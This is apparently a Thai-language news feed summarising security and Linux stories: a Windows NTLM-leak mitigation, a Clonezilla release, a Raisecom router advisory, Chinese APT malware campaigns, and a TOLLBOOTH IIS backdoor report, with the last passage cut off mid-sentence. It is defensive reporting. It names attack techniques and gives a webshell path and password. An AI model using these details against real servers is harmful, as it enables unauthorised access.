    อัปเดตระบบให้เป็นเวอร์ชันล่าสุดเพื่อรับการป้องกันเต็มรูปแบบ

    https://securityonline.info/security-first-windows-11-disables-file-previews-for-web-downloads/
    🛡️ Windows 11 ปรับระบบความปลอดภัย: ปิดการแสดงตัวอย่างไฟล์ที่ดาวน์โหลดจากเว็บ Microsoft ได้ออกอัปเดตใหม่สำหรับ Windows 11 ที่มุ่งเน้นการเพิ่มความปลอดภัยของผู้ใช้งาน โดยเฉพาะในส่วนของ File Explorer ซึ่งตอนนี้จะไม่แสดงตัวอย่างไฟล์ที่ดาวน์โหลดจากอินเทอร์เน็ตโดยอัตโนมัติอีกต่อไป การเปลี่ยนแปลงนี้เกิดขึ้นจากการค้นพบช่องโหว่ที่อาจเปิดทางให้แฮกเกอร์ขโมยข้อมูลสำคัญ เช่น NTLM authentication hashes ผ่านการ preview ไฟล์ HTML ที่มีการอ้างอิงไปยัง path ภายนอก เมื่อผู้ใช้พยายามเปิด preview ไฟล์ที่มี “web mark” หรือถูกระบุว่ามาจากอินเทอร์เน็ต ระบบจะแสดงคำเตือนว่า “ไฟล์นี้อาจเป็นอันตรายต่อคอมพิวเตอร์ของคุณ” และแนะนำให้เปิดไฟล์ด้วยความระมัดระวัง หากผู้ใช้มั่นใจว่าไฟล์ปลอดภัย ก็สามารถคลิกขวา เลือก Properties แล้วกด “Unblock” เพื่อเปิด preview ได้ตามปกติ การปรับปรุงนี้ครอบคลุม Windows 11, Windows 10 (รวมเวอร์ชัน ESU), Windows Server 2012/2012 R2/2016/2019/2025 และ Windows Server version 23H2 ✅ การเปลี่ยนแปลงใน File Explorer ➡️ ปิดการแสดง preview สำหรับไฟล์ที่ดาวน์โหลดจากเว็บ ➡️ แสดงคำเตือนเมื่อพยายาม preview ไฟล์ที่มี “web mark” ➡️ ผู้ใช้สามารถ “Unblock” ไฟล์เพื่อเปิด preview ได้ ✅ เหตุผลด้านความปลอดภัย ➡️ ป้องกันการรั่วไหลของ NTLM authentication hashes ➡️ ช่องโหว่เกิดจากการ preview ไฟล์ HTML ที่อ้างอิง path ภายนอก ➡️ ลดความเสี่ยงจากการเปิดไฟล์อันตรายโดยไม่ตั้งใจ ✅ ระบบที่ได้รับผลกระทบ ➡️ Windows 11 และ Windows 10 ทุกเวอร์ชัน ➡️ Windows Server 2012 ถึง 2025 รวมถึงเวอร์ชัน 23H2 ‼️ คำเตือนสำหรับผู้ใช้งาน ⛔ อย่าเปิด preview ไฟล์จากอินเทอร์เน็ตโดยไม่ตรวจสอบแหล่งที่มา ⛔ ไฟล์ HTML ที่มีการอ้างอิงภายนอกอาจเป็นช่องทางโจมตี ⛔ การเปิด preview โดยไม่ “Unblock” อาจทำให้ระบบแสดงคำเตือนหรือปิดการทำงานบางส่วน ‼️ คำแนะนำเพิ่มเติม ⛔ ตรวจสอบแหล่งที่มาของไฟล์ก่อนเปิดใช้งาน ⛔ ใช้ฟีเจอร์ “Unblock” เฉพาะเมื่อมั่นใจว่าไฟล์ปลอดภัย ⛔ อัปเดตระบบให้เป็นเวอร์ชันล่าสุดเพื่อรับการป้องกันเต็มรูปแบบ https://securityonline.info/security-first-windows-11-disables-file-previews-for-web-downloads/
    SECURITYONLINE.INFO
    Security First: Windows 11 Disables File Previews for Web Downloads
    Microsoft disabled File Explorer previews for web-downloaded files to block an NTLM hash leak vulnerability, prioritizing security over convenience.
    0 ความคิดเห็น 0 การแบ่งปัน 24 มุมมอง 0 รีวิว
  • “Clonezilla Live 3.3.0-33 มาแล้ว! รองรับการโคลน MTD และ eMMC พร้อมเครื่องมือใหม่เพียบ”

    Clonezilla Live เวอร์ชัน 3.3.0-33 เพิ่งเปิดตัว โดยเป็นระบบ live OS สำหรับการโคลนดิสก์และพาร์ทิชันที่อิงจาก Debian และใช้ Linux kernel 6.16 จุดเด่นของเวอร์ชันนี้คือการเพิ่มการรองรับการโคลนอุปกรณ์ MTD block และ eMMC boot ในโหมดผู้เชี่ยวชาญ (expert mode) ซึ่งเป็นประโยชน์มากสำหรับงาน embedded system และอุปกรณ์ IoT

    นอกจากนี้ยังมีเครื่องมือใหม่ชื่อว่า ocs-blkdev-sorter ที่ช่วยให้ udev สร้าง alias block device ใน /dev/ocs-disks/ ได้สะดวกขึ้น และ ocs-live-time-sync สำหรับซิงค์เวลาในระบบผ่าน ocs-live-netcfg

    ยังมีการเพิ่มตัวเลือก -uoab ใน ocs-sr และ ocs-live-feed-img เพื่อให้เลือก alias block device ได้จาก UI แบบข้อความ และเครื่องมือใหม่อีกหลายตัว เช่น ocs-cmd-screen-sample, ocs-live-gen-ubrd, และ ocs-blk-dev-info ที่ให้ข้อมูล block device ในรูปแบบ JSON

    ด้านระบบยังมีการเพิ่มแพ็กเกจสำคัญ เช่น atd, cron, upower, และ dhcpcd-base รวมถึงปรับปรุงการตั้งค่า locale และ keymap ให้เลือกได้จาก shell login โดยใช้ fbterm เป็นค่าเริ่มต้น

    สุดท้าย Clonezilla Live 3.3.0-33 ยังอัปเดตสคริปต์ต่าง ๆ เช่น ocs-iso-2-onie, ocs-cvt-dev, และ ocs-live-swap-kernel เพื่อรองรับการใช้งานที่ซับซ้อนมากขึ้น พร้อมปรับปรุงประสิทธิภาพและแก้บั๊กหลายจุด

    ความสามารถใหม่ใน Clonezilla Live 3.3.0-33
    รองรับการโคลน MTD block และ eMMC boot device ใน expert mode
    เพิ่ม ocs-blkdev-sorter สำหรับสร้าง alias block device
    เพิ่ม ocs-live-time-sync สำหรับซิงค์เวลา
    เพิ่ม ocs-cmd-screen-sample และ ocs-live-gen-ubrd
    เพิ่ม ocs-blk-dev-info สำหรับแสดงข้อมูล block device แบบ JSON

    การปรับปรุงระบบและ UI
    เพิ่มตัวเลือก -uoab ใน UI แบบข้อความ
    ปรับ locale และ keymap ให้เลือกจาก shell login ด้วย fbterm
    ปรับปรุง ocs-iso-2-onie, ocs-cvt-dev, ocs-live-swap-kernel
    เพิ่มการรองรับ CPU architecture ในชื่อไฟล์ ISO/ZIP
    ปรับปรุงการแสดงผลของ ocs-scan-disk และ ocs-get-dev-info

    แพ็กเกจและระบบพื้นฐาน
    เพิ่มแพ็กเกจ atd, cron, upower, dhcpcd-base
    ใช้ Debian Sid (ณ วันที่ 17 ต.ค. 2025) เป็นฐานระบบ
    อัปเดต Partclone เป็นเวอร์ชัน 0.3.38 (แก้บั๊กเกี่ยวกับ btrfs)
    ปรับ grub.cfg ให้ใช้ efitextmode 0
    เพิ่มกลไกตั้งค่า timezone จาก BIOS หากไม่มีอินเทอร์เน็ต

    https://9to5linux.com/clonezilla-live-3-3-0-33-adds-support-for-cloning-mtd-block-and-emmc-boot-devices
    💾 “Clonezilla Live 3.3.0-33 มาแล้ว! รองรับการโคลน MTD และ eMMC พร้อมเครื่องมือใหม่เพียบ” Clonezilla Live เวอร์ชัน 3.3.0-33 เพิ่งเปิดตัว โดยเป็นระบบ live OS สำหรับการโคลนดิสก์และพาร์ทิชันที่อิงจาก Debian และใช้ Linux kernel 6.16 จุดเด่นของเวอร์ชันนี้คือการเพิ่มการรองรับการโคลนอุปกรณ์ MTD block และ eMMC boot ในโหมดผู้เชี่ยวชาญ (expert mode) ซึ่งเป็นประโยชน์มากสำหรับงาน embedded system และอุปกรณ์ IoT นอกจากนี้ยังมีเครื่องมือใหม่ชื่อว่า ocs-blkdev-sorter ที่ช่วยให้ udev สร้าง alias block device ใน /dev/ocs-disks/ ได้สะดวกขึ้น และ ocs-live-time-sync สำหรับซิงค์เวลาในระบบผ่าน ocs-live-netcfg ยังมีการเพิ่มตัวเลือก -uoab ใน ocs-sr และ ocs-live-feed-img เพื่อให้เลือก alias block device ได้จาก UI แบบข้อความ และเครื่องมือใหม่อีกหลายตัว เช่น ocs-cmd-screen-sample, ocs-live-gen-ubrd, และ ocs-blk-dev-info ที่ให้ข้อมูล block device ในรูปแบบ JSON ด้านระบบยังมีการเพิ่มแพ็กเกจสำคัญ เช่น atd, cron, upower, และ dhcpcd-base รวมถึงปรับปรุงการตั้งค่า locale และ keymap ให้เลือกได้จาก shell login โดยใช้ fbterm เป็นค่าเริ่มต้น สุดท้าย Clonezilla Live 3.3.0-33 ยังอัปเดตสคริปต์ต่าง ๆ เช่น ocs-iso-2-onie, ocs-cvt-dev, และ ocs-live-swap-kernel เพื่อรองรับการใช้งานที่ซับซ้อนมากขึ้น พร้อมปรับปรุงประสิทธิภาพและแก้บั๊กหลายจุด ✅ ความสามารถใหม่ใน Clonezilla Live 3.3.0-33 ➡️ รองรับการโคลน MTD block และ eMMC boot device ใน expert mode ➡️ เพิ่ม ocs-blkdev-sorter สำหรับสร้าง alias block device ➡️ เพิ่ม ocs-live-time-sync สำหรับซิงค์เวลา ➡️ เพิ่ม ocs-cmd-screen-sample และ ocs-live-gen-ubrd ➡️ เพิ่ม ocs-blk-dev-info สำหรับแสดงข้อมูล block device แบบ JSON ✅ การปรับปรุงระบบและ UI ➡️ เพิ่มตัวเลือก -uoab ใน UI แบบข้อความ ➡️ ปรับ locale และ keymap ให้เลือกจาก shell login ด้วย fbterm ➡️ ปรับปรุง ocs-iso-2-onie, ocs-cvt-dev, ocs-live-swap-kernel ➡️ เพิ่มการรองรับ CPU architecture ในชื่อไฟล์ ISO/ZIP ➡️ ปรับปรุงการแสดงผลของ ocs-scan-disk และ ocs-get-dev-info ✅ แพ็กเกจและระบบพื้นฐาน ➡️ เพิ่มแพ็กเกจ atd, cron, upower, dhcpcd-base ➡️ ใช้ Debian Sid (ณ วันที่ 17 ต.ค. 2025) เป็นฐานระบบ ➡️ อัปเดต Partclone เป็นเวอร์ชัน 0.3.38 (แก้บั๊กเกี่ยวกับ btrfs) ➡️ ปรับ grub.cfg ให้ใช้ efitextmode 0 ➡️ เพิ่มกลไกตั้งค่า timezone จาก BIOS หากไม่มีอินเทอร์เน็ต https://9to5linux.com/clonezilla-live-3-3-0-33-adds-support-for-cloning-mtd-block-and-emmc-boot-devices
    9TO5LINUX.COM
    Clonezilla Live 3.3.0-33 Adds Support for Cloning MTD Block and eMMC Boot Devices - 9to5Linux
    Clonezilla Live 3.3.0-33 open-source and free disk cloning/imaging tool is now available for download with various changes and updated components.
    0 ความคิดเห็น 0 การแบ่งปัน 92 มุมมอง 0 รีวิว
  • “CISA เตือนช่องโหว่ Raisecom RAX701-GC – SSH เข้า root ได้โดยไม่ต้องยืนยันตัวตน!”

    CISA ออกประกาศเตือนช่องโหว่ร้ายแรงในเราเตอร์ Raisecom รุ่น RAX701-GC ที่ใช้ในระบบอุตสาหกรรมและโทรคมนาคม โดยช่องโหว่นี้มีรหัสว่า CVE-2025-11534 และได้คะแนน CVSS สูงถึง 9.8 ซึ่งถือว่า “วิกฤต” เพราะเปิดให้ผู้โจมตีสามารถเข้าถึง shell ของระบบด้วยสิทธิ์ root โดยไม่ต้องยืนยันตัวตนผ่าน SSH เลย

    ช่องโหว่นี้เกิดจากการที่อุปกรณ์อนุญาตให้สร้าง session SSH ได้โดยไม่ต้องผ่านขั้นตอนการยืนยันตัวตน ซึ่งผิดหลักการของระบบความปลอดภัยอย่างร้ายแรง โดย CISA จัดช่องโหว่นี้ไว้ในหมวด CWE-288: Authentication Bypass Using an Alternate Path or Channel

    อุปกรณ์ที่ได้รับผลกระทบคือ Raisecom RAX701-GC-WP-01 ที่ใช้ firmware เวอร์ชัน P200R002C52 และ P200R002C53 ซึ่งรวมถึงเวอร์ชัน 5.5.13_20180720, 5.5.27_20190111 และ 5.5.36_20190709

    ช่องโหว่นี้ถูกค้นพบโดย HD Moore และ Tod Beardsley จาก runZero และถูกแจ้งไปยัง CISA เพื่อเปิดเผยอย่างเป็นทางการ แต่ทาง Raisecom ยังไม่ตอบรับหรือออกแพตช์ใด ๆ ทำให้ผู้ดูแลระบบต้องใช้วิธีป้องกันเชิงเครือข่าย เช่น segmentation และ firewall เพื่อจำกัดการเข้าถึง

    แม้ยังไม่มีรายงานการโจมตีจริง แต่ CISA เตือนว่าเนื่องจากช่องโหว่นี้สามารถใช้จากระยะไกลได้ง่าย และให้สิทธิ์สูงสุด จึงควรรีบดำเนินการป้องกันทันที

    รายละเอียดช่องโหว่ CVE-2025-11534
    เกิดจากการ bypass authentication ใน SSH
    ผู้โจมตีสามารถเข้าถึง shell ด้วยสิทธิ์ root โดยไม่ต้อง login
    ได้คะแนน CVSS v3.1 สูงถึง 9.8
    จัดอยู่ในหมวด CWE-288 โดย CISA
    ส่งผลกระทบต่อ Raisecom RAX701-GC-WP-01 firmware หลายเวอร์ชัน

    การค้นพบและการเปิดเผย
    ค้นพบโดย HD Moore และ Tod Beardsley จาก runZero
    แจ้งไปยัง CISA เพื่อเปิดเผยอย่างเป็นทางการ
    Raisecom ยังไม่ตอบรับหรือออกแพตช์ใด ๆ
    ผู้ดูแลระบบต้องใช้วิธีป้องกันเชิงเครือข่ายแทน

    แนวทางการป้องกันจาก CISA
    แยกเครือข่ายควบคุมออกจากเครือข่ายธุรกิจ
    ใช้ firewall เพื่อจำกัดการเข้าถึงจากภายนอก
    ใช้ VPN ที่ปลอดภัยและอัปเดตอยู่เสมอ
    ตรวจสอบการเชื่อมต่อ SSH ที่ไม่ได้รับอนุญาต
    เฝ้าระวังพฤติกรรมผิดปกติจากอุปกรณ์ Raisecom

    https://securityonline.info/cisa-warns-critical-raisecom-router-flaw-cve-2025-11534-cvss-9-8-allows-unauthenticated-root-ssh-access/
    🚨 “CISA เตือนช่องโหว่ Raisecom RAX701-GC – SSH เข้า root ได้โดยไม่ต้องยืนยันตัวตน!” CISA ออกประกาศเตือนช่องโหว่ร้ายแรงในเราเตอร์ Raisecom รุ่น RAX701-GC ที่ใช้ในระบบอุตสาหกรรมและโทรคมนาคม โดยช่องโหว่นี้มีรหัสว่า CVE-2025-11534 และได้คะแนน CVSS สูงถึง 9.8 ซึ่งถือว่า “วิกฤต” เพราะเปิดให้ผู้โจมตีสามารถเข้าถึง shell ของระบบด้วยสิทธิ์ root โดยไม่ต้องยืนยันตัวตนผ่าน SSH เลย ช่องโหว่นี้เกิดจากการที่อุปกรณ์อนุญาตให้สร้าง session SSH ได้โดยไม่ต้องผ่านขั้นตอนการยืนยันตัวตน ซึ่งผิดหลักการของระบบความปลอดภัยอย่างร้ายแรง โดย CISA จัดช่องโหว่นี้ไว้ในหมวด CWE-288: Authentication Bypass Using an Alternate Path or Channel อุปกรณ์ที่ได้รับผลกระทบคือ Raisecom RAX701-GC-WP-01 ที่ใช้ firmware เวอร์ชัน P200R002C52 และ P200R002C53 ซึ่งรวมถึงเวอร์ชัน 5.5.13_20180720, 5.5.27_20190111 และ 5.5.36_20190709 ช่องโหว่นี้ถูกค้นพบโดย HD Moore และ Tod Beardsley จาก runZero และถูกแจ้งไปยัง CISA เพื่อเปิดเผยอย่างเป็นทางการ แต่ทาง Raisecom ยังไม่ตอบรับหรือออกแพตช์ใด ๆ ทำให้ผู้ดูแลระบบต้องใช้วิธีป้องกันเชิงเครือข่าย เช่น segmentation และ firewall เพื่อจำกัดการเข้าถึง แม้ยังไม่มีรายงานการโจมตีจริง แต่ CISA เตือนว่าเนื่องจากช่องโหว่นี้สามารถใช้จากระยะไกลได้ง่าย และให้สิทธิ์สูงสุด จึงควรรีบดำเนินการป้องกันทันที ✅ รายละเอียดช่องโหว่ CVE-2025-11534 ➡️ เกิดจากการ bypass authentication ใน SSH ➡️ ผู้โจมตีสามารถเข้าถึง shell ด้วยสิทธิ์ root โดยไม่ต้อง login ➡️ ได้คะแนน CVSS v3.1 สูงถึง 9.8 ➡️ จัดอยู่ในหมวด CWE-288 โดย CISA ➡️ ส่งผลกระทบต่อ Raisecom RAX701-GC-WP-01 firmware หลายเวอร์ชัน ✅ การค้นพบและการเปิดเผย ➡️ ค้นพบโดย HD Moore และ Tod Beardsley จาก runZero ➡️ แจ้งไปยัง CISA เพื่อเปิดเผยอย่างเป็นทางการ ➡️ Raisecom ยังไม่ตอบรับหรือออกแพตช์ใด ๆ ➡️ ผู้ดูแลระบบต้องใช้วิธีป้องกันเชิงเครือข่ายแทน ✅ แนวทางการป้องกันจาก CISA ➡️ แยกเครือข่ายควบคุมออกจากเครือข่ายธุรกิจ ➡️ ใช้ firewall เพื่อจำกัดการเข้าถึงจากภายนอก ➡️ ใช้ VPN ที่ปลอดภัยและอัปเดตอยู่เสมอ ➡️ ตรวจสอบการเชื่อมต่อ SSH ที่ไม่ได้รับอนุญาต ➡️ เฝ้าระวังพฤติกรรมผิดปกติจากอุปกรณ์ Raisecom https://securityonline.info/cisa-warns-critical-raisecom-router-flaw-cve-2025-11534-cvss-9-8-allows-unauthenticated-root-ssh-access/
    SECURITYONLINE.INFO
    CISA Warns: Critical Raisecom Router Flaw (CVE-2025-11534, CVSS 9.8) Allows Unauthenticated Root SSH Access
    CISA issued an alert for a Critical (CVSS 9.8) Auth Bypass flaw (CVE-2025-11534) in Raisecom RAX701-GC routers, allowing unauthenticated root shell via SSH. The vendor has not yet responded with a patch.
    0 ความคิดเห็น 0 การแบ่งปัน 99 มุมมอง 0 รีวิว
  • “Symantec แฉแคมเปญจารกรรมจีน – ใช้ Zingdoor, ShadowPad และ KrustyLoader เจาะหน่วยงานทั่วโลก!”

    Symantec เปิดเผยแคมเปญจารกรรมไซเบอร์ระดับโลกที่มีความเชื่อมโยงกับกลุ่ม APT ของจีนหลายกลุ่ม โดยพบการใช้เครื่องมือมัลแวร์ที่ซับซ้อน ได้แก่ Zingdoor, ShadowPad และ KrustyLoader ซึ่งเคยถูกใช้โดยกลุ่ม Glowworm (Earth Estries) และ UNC5221 มาก่อน

    แคมเปญนี้เจาะระบบของหน่วยงานรัฐบาลในอเมริกาใต้และมหาวิทยาลัยในสหรัฐฯ โดยใช้ช่องโหว่ใน SQL Server และ Apache HTTP เป็นจุดเริ่มต้น จากนั้นฝัง DLL อันตรายผ่าน binary ที่ดูเหมือนซอฟต์แวร์ของ Symantec เพื่อหลบการตรวจจับ

    Zingdoor เป็น backdoor ที่เขียนด้วย Go สามารถเก็บข้อมูลระบบ, อัปโหลด/ดาวน์โหลดไฟล์ และรันคำสั่งได้ โดยถูก sideload ผ่าน binary ของ Trend Micro เพื่อให้ดูเหมือนโปรแกรมปกติ

    ShadowPad เป็น Remote Access Trojan (RAT) แบบ modular ที่สามารถโหลดโมดูลใหม่ได้ตามต้องการ ใช้ DLL sideloading เพื่อซ่อนตัว และถูกใช้โดยหลายกลุ่ม APT ของจีน เช่น APT41, Blackfly และ Grayfly

    KrustyLoader เป็น dropper ที่เขียนด้วย Rust มีฟีเจอร์ anti-analysis และ self-delete ก่อนจะโหลด payload ขั้นที่สอง เช่น Sliver C2 framework ซึ่งใช้ควบคุมระบบจากระยะไกล

    นอกจากมัลแวร์เฉพาะทางแล้ว แฮกเกอร์ยังใช้เครื่องมือทั่วไปของ Windows เช่น Certutil, Procdump, Revsocks และ PetitPotam เพื่อขโมย credentials และยกระดับสิทธิ์ในระบบ

    Symantec ระบุว่าการโจมตีนี้เกี่ยวข้องกับการใช้ช่องโหว่ ToolShell ที่ Microsoft เคยรายงาน โดยพบว่ามีการใช้จากกลุ่มอื่นนอกเหนือจาก Budworm, Sheathminer และ Storm-2603 ซึ่งแสดงให้เห็นถึง ecosystem การโจมตีที่กว้างกว่าที่เคยคิด

    เครื่องมือมัลแวร์ที่ใช้ในแคมเปญ
    Zingdoor – backdoor เขียนด้วย Go ใช้ sideload ผ่าน Trend Micro
    ShadowPad – modular RAT ที่โหลดโมดูลใหม่ได้ ใช้ DLL sideloading
    KrustyLoader – Rust-based dropper ที่โหลด Sliver C2 framework
    ใช้เครื่องมือทั่วไปของ Windows เช่น Certutil, Revsocks, Procdump
    ใช้ PetitPotam เพื่อขโมย credentials จาก domain controller

    กลุ่ม APT ที่เกี่ยวข้อง
    Glowworm (Earth Estries), FamousSparrow
    UNC5221 – กลุ่มที่มีความเชื่อมโยงกับจีน
    APT41, Blackfly, Grayfly – ใช้ ShadowPad
    REF3927 – กลุ่มใหม่ที่ใช้ ToolShell ร่วมกับกลุ่มอื่น

    เป้าหมายของการโจมตี
    หน่วยงานรัฐบาลในอเมริกาใต้
    มหาวิทยาลัยในสหรัฐฯ
    ระบบ SharePoint ที่มีช่องโหว่
    เป้าหมายเชิงยุทธศาสตร์ที่มีข้อมูลสำคัญ
    สร้างการเข้าถึงระยะยาวและขโมยข้อมูลอย่างต่อเนื่อง

    https://securityonline.info/symantec-exposes-chinese-apt-overlap-zingdoor-shadowpad-and-krustyloader-used-in-global-espionage/
    🕵️‍♀️ “Symantec แฉแคมเปญจารกรรมจีน – ใช้ Zingdoor, ShadowPad และ KrustyLoader เจาะหน่วยงานทั่วโลก!” Symantec เปิดเผยแคมเปญจารกรรมไซเบอร์ระดับโลกที่มีความเชื่อมโยงกับกลุ่ม APT ของจีนหลายกลุ่ม โดยพบการใช้เครื่องมือมัลแวร์ที่ซับซ้อน ได้แก่ Zingdoor, ShadowPad และ KrustyLoader ซึ่งเคยถูกใช้โดยกลุ่ม Glowworm (Earth Estries) และ UNC5221 มาก่อน แคมเปญนี้เจาะระบบของหน่วยงานรัฐบาลในอเมริกาใต้และมหาวิทยาลัยในสหรัฐฯ โดยใช้ช่องโหว่ใน SQL Server และ Apache HTTP เป็นจุดเริ่มต้น จากนั้นฝัง DLL อันตรายผ่าน binary ที่ดูเหมือนซอฟต์แวร์ของ Symantec เพื่อหลบการตรวจจับ Zingdoor เป็น backdoor ที่เขียนด้วย Go สามารถเก็บข้อมูลระบบ, อัปโหลด/ดาวน์โหลดไฟล์ และรันคำสั่งได้ โดยถูก sideload ผ่าน binary ของ Trend Micro เพื่อให้ดูเหมือนโปรแกรมปกติ ShadowPad เป็น Remote Access Trojan (RAT) แบบ modular ที่สามารถโหลดโมดูลใหม่ได้ตามต้องการ ใช้ DLL sideloading เพื่อซ่อนตัว และถูกใช้โดยหลายกลุ่ม APT ของจีน เช่น APT41, Blackfly และ Grayfly KrustyLoader เป็น dropper ที่เขียนด้วย Rust มีฟีเจอร์ anti-analysis และ self-delete ก่อนจะโหลด payload ขั้นที่สอง เช่น Sliver C2 framework ซึ่งใช้ควบคุมระบบจากระยะไกล นอกจากมัลแวร์เฉพาะทางแล้ว แฮกเกอร์ยังใช้เครื่องมือทั่วไปของ Windows เช่น Certutil, Procdump, Revsocks และ PetitPotam เพื่อขโมย credentials และยกระดับสิทธิ์ในระบบ Symantec ระบุว่าการโจมตีนี้เกี่ยวข้องกับการใช้ช่องโหว่ ToolShell ที่ Microsoft เคยรายงาน โดยพบว่ามีการใช้จากกลุ่มอื่นนอกเหนือจาก Budworm, Sheathminer และ Storm-2603 ซึ่งแสดงให้เห็นถึง ecosystem การโจมตีที่กว้างกว่าที่เคยคิด ✅ เครื่องมือมัลแวร์ที่ใช้ในแคมเปญ ➡️ Zingdoor – backdoor เขียนด้วย Go ใช้ sideload ผ่าน Trend Micro ➡️ ShadowPad – modular RAT ที่โหลดโมดูลใหม่ได้ ใช้ DLL sideloading ➡️ KrustyLoader – Rust-based dropper ที่โหลด Sliver C2 framework ➡️ ใช้เครื่องมือทั่วไปของ Windows เช่น Certutil, Revsocks, Procdump ➡️ ใช้ PetitPotam เพื่อขโมย credentials จาก domain controller ✅ กลุ่ม APT ที่เกี่ยวข้อง ➡️ Glowworm (Earth Estries), FamousSparrow ➡️ UNC5221 – กลุ่มที่มีความเชื่อมโยงกับจีน ➡️ APT41, Blackfly, Grayfly – ใช้ ShadowPad ➡️ REF3927 – กลุ่มใหม่ที่ใช้ ToolShell ร่วมกับกลุ่มอื่น ✅ เป้าหมายของการโจมตี ➡️ หน่วยงานรัฐบาลในอเมริกาใต้ ➡️ มหาวิทยาลัยในสหรัฐฯ ➡️ ระบบ SharePoint ที่มีช่องโหว่ ➡️ เป้าหมายเชิงยุทธศาสตร์ที่มีข้อมูลสำคัญ ➡️ สร้างการเข้าถึงระยะยาวและขโมยข้อมูลอย่างต่อเนื่อง https://securityonline.info/symantec-exposes-chinese-apt-overlap-zingdoor-shadowpad-and-krustyloader-used-in-global-espionage/
    SECURITYONLINE.INFO
    Symantec Exposes Chinese APT Overlap: Zingdoor, ShadowPad, and KrustyLoader Used in Global Espionage
    Symantec exposed a complex Chinese APT network (Glowworm/UNC5221) deploying Zingdoor and ShadowPad across US/South American targets. The groups abuse DLL sideloading and PetitPotam for credential theft.
    0 ความคิดเห็น 0 การแบ่งปัน 108 มุมมอง 0 รีวิว
  • “แฮกเกอร์จีนใช้คีย์ ASP.NET ที่หลุด – ฝัง TOLLBOOTH Backdoor และ Rootkit บน IIS Server ทั่วโลก!”

    Elastic Security Labs และ Texas A&M University System Cybersecurity เผยการค้นพบแคมเปญโจมตีจากกลุ่มแฮกเกอร์ที่พูดภาษาจีน ซึ่งใช้คีย์ ASP.NET ที่ถูกเปิดเผยต่อสาธารณะในการเจาะระบบ Microsoft IIS Server ที่ตั้งค่าผิดพลาด

    แฮกเกอร์ใช้คีย์ machineKey ที่หลุดจากเอกสาร Microsoft และ StackOverflow เพื่อสร้าง payload ที่สามารถ deserialization ผ่าน ViewState ได้ ทำให้สามารถรันคำสั่งบนเซิร์ฟเวอร์ได้โดยไม่ต้องยืนยันตัวตน

    หลังจากเจาะระบบได้แล้ว พวกเขาจะติดตั้ง backdoor ชื่อว่า TOLLBOOTH ซึ่งเป็น IIS module ที่มีความสามารถทั้ง SEO cloaking, webshell, และ command execution โดยมี webshell ซ่อนอยู่ที่ /mywebdll พร้อมรหัสผ่าน hack123456!

    TOLLBOOTH ยังสามารถแยกแยะระหว่าง bot ของ search engine กับผู้ใช้จริง เพื่อแสดงเนื้อหาหลอกลวงให้ bot เห็น (เพื่อดัน SEO) และ redirect ผู้ใช้ไปยังเว็บไซต์อันตราย ซึ่งเป็นเทคนิคที่เรียกว่า link farm network

    หากวิธีฝัง backdoor ล้มเหลว แฮกเกอร์จะใช้เครื่องมือ Remote Monitoring & Management (RMM) ชื่อ GotoHTTP เพื่อควบคุมเครื่องผ่านเบราว์เซอร์โดยตรง

    นอกจากนี้ยังพบ rootkit ระดับ kernel ที่ชื่อว่า HIDDENDRIVER ซึ่งดัดแปลงจากโครงการโอเพ่นซอร์สชื่อ “Hidden” โดยใช้เทคนิค DKOM (Direct Kernel Object Manipulation) เพื่อซ่อน process, ไฟล์ และ registry key จากเครื่องมือวิเคราะห์ระบบ

    การโจมตีนี้ถูกจัดกลุ่มเป็น REF3927 และพบว่ามีความเชื่อมโยงกับแคมเปญที่ Microsoft และ AhnLab เคยรายงานมาก่อน โดยมีเป้าหมายเป็นเซิร์ฟเวอร์ IIS กว่า 571 เครื่องทั่วโลก ยกเว้นในประเทศจีน ซึ่งสอดคล้องกับพฤติกรรมของกลุ่มแฮกเกอร์จีนที่มักหลีกเลี่ยงการโจมตีภายในประเทศตัวเอง

    วิธีการโจมตี
    ใช้คีย์ ASP.NET machineKey ที่ถูกเปิดเผยสู่สาธารณะ
    สร้าง ViewState payload เพื่อรันคำสั่งบน IIS Server
    ติดตั้ง TOLLBOOTH IIS module เป็น backdoor
    ใช้ GotoHTTP หากฝัง backdoor ไม่สำเร็จ
    ติดตั้ง rootkit HIDDENDRIVER เพื่อซ่อนการทำงาน

    ความสามารถของ TOLLBOOTH
    มี webshell ซ่อนอยู่ที่ /mywebdll พร้อมรหัสผ่าน
    รองรับการอัปโหลดไฟล์และรันคำสั่ง
    มี endpoint สำหรับ health check, debug และ clean
    มี SEO cloaking engine เพื่อหลอก bot และ redirect ผู้ใช้
    ใช้ JSON config จากเซิร์ฟเวอร์ควบคุม

    ความสามารถของ HIDDENDRIVER
    ใช้เทคนิค DKOM เพื่อซ่อน process, ไฟล์ และ registry
    มี companion app ชื่อ HIDDENCLI เขียนด้วยภาษาจีน
    ปรับปรุงจากโปรเจกต์ “Hidden” ด้วยฟีเจอร์ AMSI bypass และ whitelist process
    ซ่อนตัวจากเครื่องมืออย่าง Process Explorer ได้

    ขอบเขตของการโจมตี
    พบการติดเชื้อใน IIS Server อย่างน้อย 571 เครื่อง
    ครอบคลุมหลายอุตสาหกรรม เช่น การเงิน โลจิสติกส์ การศึกษา
    ไม่มีเหยื่อในประเทศจีน – สะท้อนการใช้ geofencing
    พบการติดตั้งซ้ำในหลายองค์กร แสดงว่าปัญหายังไม่ถูกแก้ที่ต้นเหตุ

    https://securityonline.info/chinese-hackers-exploit-exposed-asp-net-keys-to-deploy-tollbooth-iis-backdoor-and-kernel-rootkit/
    🕳️ “แฮกเกอร์จีนใช้คีย์ ASP.NET ที่หลุด – ฝัง TOLLBOOTH Backdoor และ Rootkit บน IIS Server ทั่วโลก!” Elastic Security Labs และ Texas A&M University System Cybersecurity เผยการค้นพบแคมเปญโจมตีจากกลุ่มแฮกเกอร์ที่พูดภาษาจีน ซึ่งใช้คีย์ ASP.NET ที่ถูกเปิดเผยต่อสาธารณะในการเจาะระบบ Microsoft IIS Server ที่ตั้งค่าผิดพลาด แฮกเกอร์ใช้คีย์ machineKey ที่หลุดจากเอกสาร Microsoft และ StackOverflow เพื่อสร้าง payload ที่สามารถ deserialization ผ่าน ViewState ได้ ทำให้สามารถรันคำสั่งบนเซิร์ฟเวอร์ได้โดยไม่ต้องยืนยันตัวตน หลังจากเจาะระบบได้แล้ว พวกเขาจะติดตั้ง backdoor ชื่อว่า TOLLBOOTH ซึ่งเป็น IIS module ที่มีความสามารถทั้ง SEO cloaking, webshell, และ command execution โดยมี webshell ซ่อนอยู่ที่ /mywebdll พร้อมรหัสผ่าน hack123456! TOLLBOOTH ยังสามารถแยกแยะระหว่าง bot ของ search engine กับผู้ใช้จริง เพื่อแสดงเนื้อหาหลอกลวงให้ bot เห็น (เพื่อดัน SEO) และ redirect ผู้ใช้ไปยังเว็บไซต์อันตราย 